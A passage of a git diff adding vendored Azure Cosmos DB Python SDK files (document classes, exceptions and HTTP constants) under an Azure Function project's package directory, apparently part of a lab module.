+ return CaseInsensitiveDict(self._headers) + + @property + def body(self): + return self._body + + @property + def request_charge(self): + return self._request_charge + + def clear(self): + self._request_charge = 0 + + def __call__(self, headers, body): + self._headers = headers + self._body = body + + self._request_charge += float(headers.get("x-ms-request-charge", 0)) + + def __getattr__(self, name): + key = "x-ms-" + name.replace("_", "-") + if key in self._common: + return self._headers[key] + raise AttributeError(name) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py new file mode 100644 index 0000000..f58f299 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/documents.py @@ -0,0 +1,444 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Classes and enums for documents in the Azure Cosmos database service. +""" + +from . import _retry_options + + +class DatabaseAccount(object): # pylint: disable=too-many-instance-attributes + """Database account. + + A DatabaseAccount is the container for databases. + + :ivar str DatabaseLink: + The self-link for Databases in the databaseAccount. + :ivar str MediaLink: + The self-link for Media in the databaseAccount. + :ivar int MaxMediaStorageUsageInMB: + Attachment content (media) storage quota in MBs (Retrieved from gateway). + :ivar int CurrentMediaStorageUsageInMB: + Current attachment content (media) usage in MBs (Retrieved from gateway). + Value is returned from cached information updated periodically and + is not guaranteed to be real time. + :ivar dict ConsistencyPolicy: + UserConsistencyPolicy settings. + :ivar dict ConsistencyPolicy['defaultConsistencyLevel']: + The default consistency level. + :ivar int ConsistencyPolicy['maxStalenessPrefix']: + In bounded staleness consistency, the maximum allowed staleness in + terms difference in sequence numbers (aka version). + :ivar int ConsistencyPolicy['maxStalenessIntervalInSeconds']: + In bounded staleness consistency, the maximum allowed staleness in + terms time interval. + :ivar boolean EnableMultipleWritableLocations: + Flag on the azure Cosmos account that indicates if writes can take + place in multiple locations. + """ + + def __init__(self): + self.DatabasesLink = "" + self.MediaLink = "" + self.MaxMediaStorageUsageInMB = 0 + self.CurrentMediaStorageUsageInMB = 0 + self.ConsumedDocumentStorageInMB = 0 + self.ReservedDocumentStorageInMB = 0 + self.ProvisionedDocumentStorageInMB = 0 + self.ConsistencyPolicy = None + self._WritableLocations = [] + self._ReadableLocations = [] + self._EnableMultipleWritableLocations = False + + @property + def WritableLocations(self): + """The list of writable locations for a geo-replicated database account. + """ + return self._WritableLocations + + @property + def ReadableLocations(self): + """The list of readable locations for a geo-replicated database account. + """ + return self._ReadableLocations + + +class ConsistencyLevel(object): + """Represents the consistency levels supported for Azure Cosmos client + operations. + + The requested ConsistencyLevel must match or be weaker than that provisioned + for the database account. Consistency levels. + + Consistency levels by order of strength are Strong, BoundedStaleness, + Session, ConsistentPrefix and Eventual. + + :ivar str ConsistencyLevel.Strong: + Strong Consistency guarantees that read operations always return the + value that was last written. + :ivar str ConsistencyLevel.BoundedStaleness: + Bounded Staleness guarantees that reads are not too out-of-date. This + can be configured based on number of operations (MaxStalenessPrefix) + or time (MaxStalenessIntervalInSeconds). + :ivar str ConsistencyLevel.Session: + Session Consistency guarantees monotonic reads (you never read old data, + then new, then old again), monotonic writes (writes are ordered) and + read your writes (your writes are immediately visible to your reads) + within any single session. + :ivar str ConsistencyLevel.Eventual: + Eventual Consistency guarantees that reads will return a subset of + writes. All writes will be eventually be available for reads. + :ivar str ConsistencyLevel.ConsistentPrefix: + ConsistentPrefix Consistency guarantees that reads will return some + prefix of all writes with no gaps. All writes will be eventually be + available for reads. + """ + + Strong = "Strong" + BoundedStaleness = "BoundedStaleness" + Session = "Session" + Eventual = "Eventual" + ConsistentPrefix = "ConsistentPrefix" + + +class IndexingMode(object): + """Specifies the supported indexing modes. + + :ivar str Consistent: + Index is updated synchronously with a create or update operation. With + consistent indexing, query behavior is the same as the default + consistency level for the collection. + + The index is always kept up to date with the data. + :ivar str Lazy: + Index is updated asynchronously with respect to a create or update + operation. Not supported for new containers since June/2020. + + With lazy indexing, queries are eventually consistent. The index is + updated when the collection is idle. + :ivar str NoIndex: + No index is provided. + + Setting IndexingMode to "None" drops the index. Use this if you don't + want to maintain the index for a document collection, to save the + storage cost or improve the write throughput. Your queries will + degenerate to scans of the entire collection. + """ + + Consistent = "consistent" + Lazy = "lazy" + NoIndex = "none" + + +class IndexKind(object): + """Specifies the index kind of index specs. + + :ivar str IndexKind.Hash: + The index entries are hashed to serve point look up queries. + Can be used to serve queries like: SELECT * FROM docs d WHERE d.prop = 5 + + :ivar str IndexKind.Range: + The index entries are ordered. Range indexes are optimized for + inequality predicate queries with efficient range scans. + Can be used to serve queries like: SELECT * FROM docs d WHERE d.prop > 5 + """ + + Hash = "Hash" + Range = "Range" + + +class PartitionKind(object): + """Specifies the kind of partitioning to be applied. + + :ivar str PartitionKind.Hash: + The partition key definition path is hashed. + """ + + Hash = "Hash" + + +class DataType(object): + """Specifies the data type of index specs. + + :ivar str Number: + Represents a numeric data type. + :ivar str String: + Represents a string data type. + :ivar str Point: + Represents a point data type. + :ivar str LineString: + Represents a line string data type. + :ivar str Polygon: + Represents a polygon data type. + :ivar str MultiPolygon: + Represents a multi-polygon data type. + """ + + Number = "Number" + String = "String" + Point = "Point" + LineString = "LineString" + Polygon = "Polygon" + MultiPolygon = "MultiPolygon" + + +class IndexingDirective(object): + """Specifies whether or not the resource is to be indexed. + + :ivar int Default: + Use any pre-defined/pre-configured defaults. + :ivar int Exclude: + Index the resource. + :ivar int Include: + Do not index the resource. + """ + + Default = 0 + Exclude = 1 + Include = 2 + + +class ConnectionMode(object): + """Represents the connection mode to be used by the client. + + :ivar int Gateway: + Use the Azure Cosmos gateway to route all requests. The gateway proxies + requests to the right data partition. + """ + + Gateway = 0 + + +class PermissionMode(object): + """Enumeration specifying applicability of a permission. + + :ivar str PermissionMode.NoneMode: + None. + :ivar str PermissionMode.Read: + Permission applicable for read operations only. + :ivar str PermissionMode.All: + Permission applicable for all operations. + """ + + NoneMode = "none" # None is python's key word. + Read = "read" + All = "all" + + +class TriggerType(object): + """Specifies the type of a trigger. + + :ivar str TriggerType.Pre: + Trigger should be executed before the associated operation(s). + :ivar str TriggerType.Post: + Trigger should be executed after the associated operation(s). + """ + + Pre = "pre" + Post = "post" + + +class TriggerOperation(object): + """Specifies the operations on which a trigger should be executed. + + :ivar str TriggerOperation.All: + All operations. + :ivar str TriggerOperation.Create: + Create operations only. + :ivar str TriggerOperation.Update: + Update operations only. + :ivar str TriggerOperation.Delete: + Delete operations only. + :ivar str TriggerOperation.Replace: + Replace operations only. + """ + + All = "all" + Create = "create" + Update = "update" + Delete = "delete" + Replace = "replace" + + +class SSLConfiguration(object): + """Configuration for SSL connections. + + See https://requests.readthedocs.io/en/master/user/advanced/#ssl-cert-verification + for more information. + + :ivar str SSLKeyFIle: + The path of the key file for ssl connection. + :ivar str SSLCertFile: + The path of the cert file for ssl connection. + :ivar str SSLCaCerts: + The path of the CA_BUNDLE file with certificates of trusted CAs. + """ + + def __init__(self): + self.SSLKeyFile = None + self.SSLCertFile = None + self.SSLCaCerts = None + + +class ProxyConfiguration(object): + """Configuration for a proxy. + + :ivar str Host: + The host address of the proxy. + :ivar int Port: + The port number of the proxy. + """ + + def __init__(self): + self.Host = None + self.Port = None + + +class ConnectionPolicy(object): # pylint: disable=too-many-instance-attributes + """Represents the Connection policy assocated with a CosmosClientConnection. + + :ivar int RequestTimeout: + Gets or sets the request timeout (time to wait for a response from a + network peer). + :ivar documents.ConnectionMode ConnectionMode: + Gets or sets the connection mode used in the client. (Currently only + Gateway is supported.) + :ivar documents.SSLConfiguration SSLConfiguration: + Gets or sets the SSL configuration. + :ivar documents.ProxyConfiguration ProxyConfiguration: + Gets or sets the proxy configuration. + :ivar boolean EnableEndpointDiscovery: + Gets or sets endpoint discovery flag for geo-replicated database + accounts. When EnableEndpointDiscovery is true, the client will + automatically discover the current write and read locations and direct + the requests to the correct location taking into consideration of the + user's preference(if provided) as PreferredLocations. + :ivar list PreferredLocations: + Gets or sets the preferred locations for geo-replicated database + accounts. When EnableEndpointDiscovery is true and PreferredLocations is + non-empty, the client will use this list to evaluate the final location, + taking into consideration the order specified in PreferredLocations. The + locations in this list are specified as the names of the azure Cosmos + locations like, 'West US', 'East US', 'Central India' and so on. + :ivar RetryOptions RetryOptions: + Gets or sets the retry options to be applied to all requests when + retrying. + :ivar boolean DisableSSLVerification: + Flag to disable SSL verification for the requests. SSL verification is + enabled by default. + + This is intended to be used only when targeting emulator endpoint to + avoid failing your requests with SSL related error. + + DO NOT set this when targeting production endpoints. + :ivar boolean UseMultipleWriteLocations: + Flag to enable writes on any locations (regions) for geo-replicated + database accounts in the Azure Cosmos database service. + :ivar ConnectionRetryConfiguration: + Retry Configuration to be used for connection retries. + :vartype ConnectionRetryConfiguration: + int or azure.cosmos.ConnectionRetryPolicy or urllib3.util.retry + """ + + __defaultRequestTimeout = 60000 # milliseconds + + def __init__(self): + self.RequestTimeout = self.__defaultRequestTimeout + self.ConnectionMode = ConnectionMode.Gateway + self.SSLConfiguration = None + self.ProxyConfiguration = None + self.EnableEndpointDiscovery = True + self.PreferredLocations = [] + self.RetryOptions = _retry_options.RetryOptions() + self.DisableSSLVerification = False + self.UseMultipleWriteLocations = False + self.ConnectionRetryConfiguration = None + + +class _OperationType(object): + """Represents the type of the operation + """ + Create = "Create" + Delete = "Delete" + ExecuteJavaScript = "ExecuteJavaScript" + Head = "Head" + HeadFeed = "HeadFeed" + Query = "Query" + Read = "Read" + ReadFeed = "ReadFeed" + Recreate = "Recreate" + Replace = "Replace" + SqlQuery = "SqlQuery" + QueryPlan = "QueryPlan" + Update = "Update" + Upsert = "Upsert" + + @staticmethod + def IsWriteOperation(operationType): + return operationType in ( + _OperationType.Create, + _OperationType.Delete, + _OperationType.Recreate, + _OperationType.ExecuteJavaScript, + _OperationType.Replace, + _OperationType.Upsert, + _OperationType.Update, + ) + + @staticmethod + def IsReadOnlyOperation(operationType): + return operationType in ( + _OperationType.Read, + _OperationType.ReadFeed, + _OperationType.Head, + _OperationType.HeadFeed, + _OperationType.Query, + _OperationType.SqlQuery, + ) + + @staticmethod + def IsFeedOperation(operationType): + return operationType in ( + _OperationType.Create, + _OperationType.Upsert, + _OperationType.ReadFeed, + _OperationType.Query, + _OperationType.SqlQuery, + _OperationType.QueryPlan, + _OperationType.HeadFeed, + ) + +class _QueryFeature(object): + NoneQuery = "NoneQuery" + Aggregate = "Aggregate" + CompositeAggregate = "CompositeAggregate" + Distinct = "Distinct" + GroupBy = "GroupBy" + MultipleAggregates = "MultipleAggregates" + MultipleOrderBy = "MultipleOrderBy" + OffsetAndLimit = "OffsetAndLimit" + OrderBy = "OrderBy" + Top = "Top" + +class _DistinctType(object): + NoneType = "None" + Ordered = "Ordered" + Unordered = "Unordered" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py new file mode 100644 index 0000000..0120c8b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py @@ -0,0 +1,34 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Service-specific Exceptions in the Azure Cosmos database service. + +.. warning:: + This module is DEPRECATED. Use `azure.cosmos.exceptions` instead. +""" +import warnings + +from .exceptions import * # pylint: disable=wildcard-import, unused-wildcard-import + +warnings.warn( + "azure.cosmos.errors module is deprecated, use azure.cosmos.exceptions instead", + DeprecationWarning +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py new file mode 100644 index 0000000..8323b1c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py @@ -0,0 +1,82 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Service-specific Exceptions in the Azure Cosmos database service. +""" +from azure.core.exceptions import ( # type: ignore # pylint: disable=unused-import + AzureError, + HttpResponseError, + ResourceExistsError, + ResourceNotFoundError +) +from . import http_constants + + +class CosmosHttpResponseError(HttpResponseError): + """An HTTP request to the Azure Cosmos database service has failed.""" + + def __init__(self, status_code=None, message=None, response=None, **kwargs): + """ + :param int status_code: HTTP response code. + :param str message: Error message. + """ + self.headers = response.headers if response else {} + self.sub_status = None + self.http_error_message = message + status = status_code or (int(response.status_code) if response else 0) + + if http_constants.HttpHeaders.SubStatus in self.headers: + self.sub_status = int(self.headers[http_constants.HttpHeaders.SubStatus]) + formatted_message = "Status code: %d Sub-status: %d\n%s" % (status, self.sub_status, str(message)) + else: + formatted_message = "Status code: %d\n%s" % (status, str(message)) + + super(CosmosHttpResponseError, self).__init__(message=formatted_message, response=response, **kwargs) + self.status_code = status + + +class CosmosResourceNotFoundError(ResourceNotFoundError, CosmosHttpResponseError): + """An HTTP error response with status code 404.""" + + +class CosmosResourceExistsError(ResourceExistsError, CosmosHttpResponseError): + """An HTTP error response with status code 409.""" + + +class CosmosAccessConditionFailedError(CosmosHttpResponseError): + """An HTTP error response with status code 412.""" + + +class CosmosClientTimeoutError(AzureError): + """An operation failed to complete within the specified timeout.""" + + def __init__(self, **kwargs): + message = "Client operation failed to complete within specified timeout." + self.response = None + self.history = None + super(CosmosClientTimeoutError, self).__init__(message, **kwargs) + + +def _partition_range_is_gone(e): + if (e.status_code == http_constants.StatusCodes.GONE + and e.sub_status == http_constants.SubStatusCodes.PARTITION_KEY_RANGE_GONE): + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py new file mode 100644 index 0000000..0f222fd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py @@ -0,0 +1,425 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""HTTP Constants in the Azure Cosmos database service. +""" + + +class HttpMethods(object): + """Constants of http methods. + """ + + Get = "GET" + Post = "POST" + Put = "PUT" + Delete = "DELETE" + Head = "HEAD" + Options = "OPTIONS" + + +class HttpHeaders(object): + """Constants of http headers. + """ + + Authorization = "authorization" + ETag = "etag" + MethodOverride = "X-HTTP-Method" + Slug = "Slug" + ContentType = "Content-Type" + LastModified = "Last-Modified" + ContentEncoding = "Content-Encoding" + CharacterSet = "CharacterSet" + UserAgent = "User-Agent" + IfModified_since = "If-Modified-Since" + IfMatch = "If-Match" + IfNoneMatch = "If-None-Match" + ContentLength = "Content-Length" + AcceptEncoding = "Accept-Encoding" + KeepAlive = "Keep-Alive" + CacheControl = "Cache-Control" + TransferEncoding = "Transfer-Encoding" + ContentLanguage = "Content-Language" + ContentLocation = "Content-Location" + ContentMd5 = "Content-Md5" + ContentRange = "Content-Range" + Accept = "Accept" + AcceptCharset = "Accept-Charset" + AcceptLanguage = "Accept-Language" + IfRange = "If-Range" + IfUnmodifiedSince = "If-Unmodified-Since" + MaxForwards = "Max-Forwards" + ProxyAuthorization = "Proxy-Authorization" + AcceptRanges = "Accept-Ranges" + ProxyAuthenticate = "Proxy-Authenticate" + RetryAfter = "Retry-After" + SetCookie = "Set-Cookie" + WwwAuthenticate = "Www-Authenticate" + Origin = "Origin" + Host = "Host" + AccessControlAllowOrigin = "Access-Control-Allow-Origin" + AccessControlAllowHeaders = "Access-Control-Allow-Headers" + KeyValueEncodingFormat = "application/x-www-form-urlencoded" + WrapAssertionFormat = "wrap_assertion_format" + WrapAssertion = "wrap_assertion" + WrapScope = "wrap_scope" + SimpleToken = "SWT" + HttpDate = "date" + Prefer = "Prefer" + Location = "Location" + Referer = "referer" + + # Query + Query = "x-ms-documentdb-query" + IsQuery = "x-ms-documentdb-isquery" + IsQueryPlanRequest = "x-ms-cosmos-is-query-plan-request" + SupportedQueryFeatures = "x-ms-cosmos-supported-query-features" + QueryVersion = "x-ms-cosmos-query-version" + + # Our custom DocDB headers + Continuation = "x-ms-continuation" + PageSize = "x-ms-max-item-count" + + # Request sender generated. Simply echoed by backend. + ActivityId = "x-ms-activity-id" + PreTriggerInclude = "x-ms-documentdb-pre-trigger-include" + PreTriggerExclude = "x-ms-documentdb-pre-trigger-exclude" + PostTriggerInclude = "x-ms-documentdb-post-trigger-include" + PostTriggerExclude = "x-ms-documentdb-post-trigger-exclude" + IndexingDirective = "x-ms-indexing-directive" + SessionToken = "x-ms-session-token" + ConsistencyLevel = "x-ms-consistency-level" + XDate = "x-ms-date" + CollectionPartitionInfo = "x-ms-collection-partition-info" + CollectionServiceInfo = "x-ms-collection-service-info" + RetryAfterInMilliseconds = "x-ms-retry-after-ms" + IsFeedUnfiltered = "x-ms-is-feed-unfiltered" + ResourceTokenExpiry = "x-ms-documentdb-expiry-seconds" + EnableScanInQuery = "x-ms-documentdb-query-enable-scan" + EmitVerboseTracesInQuery = "x-ms-documentdb-query-emit-traces" + SubStatus = "x-ms-substatus" + AlternateContentPath = "x-ms-alt-content-path" + IsContinuationExpected = "x-ms-documentdb-query-iscontinuationexpected" + PopulateQueryMetrics = "x-ms-documentdb-populatequerymetrics" + + # Quota Info + MaxEntityCount = "x-ms-root-entity-max-count" + CurrentEntityCount = "x-ms-root-entity-current-count" + CollectionQuotaInMb = "x-ms-collection-quota-mb" + CollectionCurrentUsageInMb = "x-ms-collection-usage-mb" + MaxMediaStorageUsageInMB = "x-ms-max-media-storage-usage-mb" + + # Collection quota + PopulateQuotaInfo = "x-ms-documentdb-populatequotainfo" + PopulatePartitionKeyRangeStatistics = "x-ms-documentdb-populatepartitionstatistics" + + # Usage Info + CurrentMediaStorageUsageInMB = "x-ms-media-storage-usage-mb" + RequestCharge = "x-ms-request-charge" + + # Address related headers. + ForceRefresh = "x-ms-force-refresh" + ItemCount = "x-ms-item-count" + NewResourceId = "x-ms-new-resource-id" + UseMasterCollectionResolver = "x-ms-use-master-collection-resolver" + + # Admin Headers + FullUpgrade = "x-ms-force-full-upgrade" + OnlyUpgradeSystemApplications = "x-ms-only-upgrade-system-applications" + OnlyUpgradeNonSystemApplications = "x-ms-only-upgrade-non-system-applications" + UpgradeFabricRingCodeAndConfig = "x-ms-upgrade-fabric-code-config" + IgnoreInProgressUpgrade = "x-ms-ignore-inprogress-upgrade" + UpgradeVerificationKind = "x-ms-upgrade-verification-kind" + IsCanary = "x-ms-iscanary" + + # Version headers and values + Version = "x-ms-version" + + # RDFE Resource Provider headers + OcpResourceProviderRegisteredUri = "ocp-resourceprovider-registered-uri" + + # For Document service management operations only. This is in + # essence a 'handle' to (long running) operations. + RequestId = "x-ms-request-id" + + # Object returning this determines what constitutes state and what + # last state change means. For replica, it is the last role change. + LastStateChangeUtc = "x-ms-last-state-change-utc" + + # Offer type. + OfferType = "x-ms-offer-type" + OfferThroughput = "x-ms-offer-throughput" + + # Custom RUs/minute headers + DisableRUPerMinuteUsage = "x-ms-documentdb-disable-ru-per-minute-usage" + IsRUPerMinuteUsed = "x-ms-documentdb-is-ru-per-minute-used" + OfferIsRUPerMinuteThroughputEnabled = "x-ms-offer-is-ru-per-minute-throughput-enabled" + + # Partitioned collection headers + PartitionKey = "x-ms-documentdb-partitionkey" + EnableCrossPartitionQuery = "x-ms-documentdb-query-enablecrosspartition" + PartitionKeyRangeID = "x-ms-documentdb-partitionkeyrangeid" + + # Upsert header + IsUpsert = "x-ms-documentdb-is-upsert" + + # Index progress headers. + IndexTransformationProgress = "x-ms-documentdb-collection-index-transformation-progress" + LazyIndexingProgress = "x-ms-documentdb-collection-lazy-indexing-progress" + + # Client generated retry count response header + ThrottleRetryCount = "x-ms-throttle-retry-count" + ThrottleRetryWaitTimeInMs = "x-ms-throttle-retry-wait-time-ms" + + # StoredProcedure related headers + EnableScriptLogging = "x-ms-documentdb-script-enable-logging" + ScriptLogResults = "x-ms-documentdb-script-log-results" + + # Change feed + AIM = "A-IM" + IncrementalFeedHeaderValue = "Incremental feed" + + # For Using Multiple Write Locations + AllowTentativeWrites = "x-ms-cosmos-allow-tentative-writes" + + # Dedicated Gateway headers + DedicatedGatewayCacheStaleness = "x-ms-dedicatedgateway-max-age" + IntegratedCacheHit = "x-ms-cosmos-cachehit" + + +class HttpHeaderPreferenceTokens(object): + """Constants of http header preference tokens. + """ + + PreferUnfilteredQueryResponse = "PreferUnfilteredQueryResponse" + + +class HttpStatusDescriptions(object): + """Constants of http status descriptions. + """ + + Accepted = "Accepted" + Conflict = "Conflict" + OK = "Ok" + PreconditionFailed = "Precondition Failed" + NotModified = "Not Modified" + NotFound = "Not Found" + BadGateway = "Bad Gateway" + BadRequest = "Bad Request" + InternalServerError = "Internal Server Error" + MethodNotAllowed = "MethodNotAllowed" + NotAcceptable = "Not Acceptable" + NoContent = "No Content" + Created = "Created" + UnsupportedMediaType = "Unsupported Media Type" + LengthRequired = "Length Required" + ServiceUnavailable = "Service Unavailable" + RequestEntityTooLarge = "Request Entity Too Large" + Unauthorized = "Unauthorized" + Forbidden = "Forbidden" + Gone = "Gone" + RequestTimeout = "Request timed out" + GatewayTimeout = "Gateway timed out" + TooManyRequests = "Too Many Requests" + RetryWith = "Retry the request" + + +class QueryStrings(object): + """Constants of query strings. + """ + + Filter = "$filter" + GenerateId = "$generateFor" + GenerateIdBatchSize = "$batchSize" + GetChildResourcePartitions = "$getChildResourcePartitions" + Url = "$resolveFor" + RootIndex = "$rootIndex" + Query = "query" + SQLQueryType = "sql" + + # RDFE Resource Provider query strings + ContentView = "contentview" + Generic = "generic" + + +class CookieHeaders(object): + """Constants of cookie headers. + """ + + SessionToken = "x-ms-session-token" + + +class Versions(object): + """Constants of versions. + """ + CurrentVersion = "2018-12-31" + SDKName = "azure-cosmos" + QueryVersion = "1.0" + + +class Delimiters(object): + """Constants of delimiters. + """ + + ClientContinuationDelimiter = "!!" + ClientContinuationFormat = "{0}!!{1}" + + +class HttpListenerErrorCodes(object): + """Constants of http listener error codes. + """ + + ERROR_OPERATION_ABORTED = 995 + ERROR_CONNECTION_INVALID = 1229 + + +class HttpContextProperties(object): + """Constants of http context properties. + """ + + SubscriptionId = "SubscriptionId" + + +class _ErrorCodes(object): + """Constants of error codes. + """ + + # Windows Socket Error Codes + WindowsInterruptedFunctionCall = 10004 + WindowsFileHandleNotValid = 10009 + WindowsPermissionDenied = 10013 + WindowsBadAddress = 10014 + WindowsInvalidArgumnet = 10022 + WindowsResourceTemporarilyUnavailable = 10035 + WindowsOperationNowInProgress = 10036 + WindowsAddressAlreadyInUse = 10048 + WindowsConnectionResetByPeer = 10054 + WindowsCannotSendAfterSocketShutdown = 10058 + WindowsConnectionTimedOut = 10060 + WindowsConnectionRefused = 10061 + WindowsNameTooLong = 10063 + WindowsHostIsDown = 10064 + WindowsNoRouteTohost = 10065 + + # Linux Error Codes + LinuxConnectionReset = 131 + + +class StatusCodes(object): + """HTTP status codes returned by the REST operations + """ + + # Success + OK = 200 + CREATED = 201 + ACCEPTED = 202 + NO_CONTENT = 204 + + NOT_MODIFIED = 304 + + # Client Error + BAD_REQUEST = 400 + UNAUTHORIZED = 401 + FORBIDDEN = 403 + NOT_FOUND = 404 + METHOD_NOT_ALLOWED = 405 + REQUEST_TIMEOUT = 408 + CONFLICT = 409 + GONE = 410 + PRECONDITION_FAILED = 412 + REQUEST_ENTITY_TOO_LARGE = 413 + TOO_MANY_REQUESTS = 429 + RETRY_WITH = 449 + + INTERNAL_SERVER_ERROR = 500 + SERVICE_UNAVAILABLE = 503 + + # Operation pause and cancel. These are FAKE status codes for QOS logging purpose only. + OPERATION_PAUSED = 1200 + OPERATION_CANCELLED = 1201 + + +class SubStatusCodes(object): + """Sub status codes returned by the REST operations specifying the details of the operation + """ + + UNKNOWN = 0 + + # 400: Bad Request Substatus + PARTITION_KEY_MISMATCH = 1001 + CROSS_PARTITION_QUERY_NOT_SERVABLE = 1004 + + # 410: StatusCodeType_Gone: substatus + NAME_CACHE_IS_STALE = 1000 + PARTITION_KEY_RANGE_GONE = 1002 + COMPLETING_SPLIT = 1007 + COMPLETING_PARTITION_MIGRATION = 1008 + + # 403: Forbidden Substatus. + WRITE_FORBIDDEN = 3 + PROVISION_LIMIT_REACHED = 1005 + DATABASE_ACCOUNT_NOT_FOUND = 1008 + REDUNDANT_COLLECTION_PUT = 1009 + SHARED_THROUGHPUT_DATABASE_QUOTA_EXCEEDED = 1010 + SHARED_THROUGHPUT_OFFER_GROW_NOT_NEEDED = 1011 + AAD_REQUEST_NOT_AUTHORIZED = 5300 + + # 404: LSN in session token is higher + READ_SESSION_NOTAVAILABLE = 1002 + OWNER_RESOURCE_NOT_FOUND = 1003 + + # 409: Conflict exception + CONFLICT_WITH_CONTROL_PLANE = 1006 + + # 503: Service Unavailable due to region being out of capacity for bindable partitions + INSUFFICIENT_BINDABLE_PARTITIONS = 1007 + + +class ResourceType(object): + """Types of resources in Azure Cosmos + """ + + Database = "dbs" + Collection = "colls" + User = "users" + Document = "docs" + Permission = "permissions" + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + Conflict = "conflicts" + Attachment = "attachments" + PartitionKeyRange = "pkranges" + Schema = "schemas" + Offer = "offers" + Topology = "topology" + DatabaseAccount = "databaseaccount" + + @staticmethod + def IsCollectionChild(resourceType): + return resourceType in ( + ResourceType.Document, + ResourceType.Attachment, + ResourceType.Conflict, + ResourceType.Schema, + ResourceType.UserDefinedFunction, + ResourceType.Trigger, + ResourceType.StoredProcedure, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py 